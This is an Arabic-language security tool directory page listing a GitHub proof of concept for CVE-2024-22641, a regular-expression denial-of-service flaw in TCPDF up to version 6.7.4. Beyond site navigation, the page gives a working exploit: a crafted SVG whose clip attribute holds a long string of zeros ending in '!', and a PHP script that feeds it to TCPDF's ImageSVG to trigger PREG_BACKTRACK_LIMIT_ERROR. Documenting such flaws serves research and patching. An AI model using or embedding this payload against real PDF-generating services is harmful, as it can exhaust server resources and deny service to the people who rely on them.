Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-22641 — إثبات المفهوم لـ CVE-2024-22641: ثغرة ReDoS في TCPDF <=6.7.4 يتم تشغيلها بواسطة ملفات SVG مصممة خصيصًا، مما يوضح استنفاد حد التراجع في التعبيرات النمطية. | Kitploit
أدوات/GitHubGitHub/zunak/cve-2024-22641
تحليل الثغرات الأمنيةالاستغلالأمن الويبالاختبار العشوائيالأوراق والأبحاثالتعلم والتعليم
GitHubzunak/cve-2024-22641

CVE-2024-22641

إثبات المفهوم لـ CVE-2024-22641: ثغرة ReDoS في TCPDF <=6.7.4 يتم تشغيلها بواسطة ملفات SVG مصممة خصيصًا، مما يوضح استنفاد حد التراجع في التعبيرات النمطية.

عرض المستودع
1منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-22641

نوع الثغرة

حرمان الخدمة عبر التعبيرات النمطية (ReDoS)

المنتج والإصدار المتأثر

TCPDF <= 6.7.4

متجه الهجوم

يقوم TCPDF بتحليل ملف SVG يحتوي على حمولة مصنوعة بعناية.

الوصف

إصدار TCPDF <= 6.7.4 عرضة لثغرة ReDoS (حرمان الخدمة عبر التعبيرات النمطية) عند تحليل ملف SVG غير موثوق.

PoC

root@kitploit:~
<!--poc.svg-->
<svg
  version="1.1"
  xmlns="http://www.w3.org/2000/svg"
  xmlns:xlink="http://www.w3.org/1999/xlink">
  <circle clip="rect(0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000!)"/>
</svg>
root@kitploit:~
<?php
require_once('../tcpdf.php');

// create new PDF document
$pdf = new TCPDF(PDF_PAGE_ORIENTATION, PDF_UNIT, PDF_PAGE_FORMAT, true, 'UTF-8', false);


// add a page
$pdf->AddPage();

$pdf->ImageSVG($file='poc.svg');
?>

ملاحظة: عند الفحص باستخدام preg_last_error() بعد سطر الكود المعرض للثغرة، سيخرج التعبير النمطي بالخطأ PREG_BACKTRACK_LIMIT_ERROR.

تنزيل الأداة